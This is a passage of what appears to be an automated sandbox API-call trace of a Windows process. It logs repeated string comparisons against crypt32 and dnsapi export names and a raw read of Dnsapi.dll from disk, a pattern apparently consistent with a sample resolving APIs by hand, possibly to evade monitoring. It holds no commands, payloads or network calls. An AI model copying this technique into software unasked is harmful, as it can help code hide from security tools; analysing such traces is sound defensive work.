lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0122.126] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0122.127] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0122.127] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0122.127] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.128] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0122.128] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0122.128] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0122.128] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0122.128] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0122.128] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0122.129] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0122.129] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0122.129] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0122.129] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.129] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.130] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0122.130] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0122.130] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0122.130] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0122.130] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0122.130] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0122.130] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0122.130] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0122.130] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0122.131] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0122.132] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0122.355] GetProcessHeap () returned 0x480000 [0122.355] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4070040 | out: hHeap=0x480000) returned 1 [0122.377] GetProcessHeap () returned 0x480000 [0122.377] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499000 [0122.378] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0122.649] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0122.649] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0122.649] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0122.649] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0122.650] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0122.650] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0122.650] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0122.650] GetProcessHeap () returned 0x480000 [0122.650] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xa7b88) returned 0x39ed010 [0122.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0122.652] ReadFile (in: hFile=0x17c, lpBuffer=0x39ed010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x39ed010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0122.666] CloseHandle (hObject=0x17c) returned 1 [0122.666] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0122.666] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.666] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0122.667] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.667] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.667] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0122.667] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.667] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.667] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0122.667] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0122.667] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.667] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.667] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0122.667] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0122.667] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0122.667] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.668] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.668] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0122.668] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0122.668] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.668] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0122.668] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.668] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.668] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0122.668] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0122.668] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.668] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0122.668] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0122.668] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.668] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.668] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0122.668] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0122.668] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.668] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0122.668] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0122.668] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0122.668] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.668] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.668] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0122.668] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0122.668] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.668] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0122.668] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.669] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0122.669] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.669] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.669] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0122.669] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0122.669] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.669] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0122.669] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0122.669] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0122.669] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.669] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.669] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0122.669] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0122.670] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0122.671] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0122.671] lstrcmpA (lpString1="DnsApiFree", 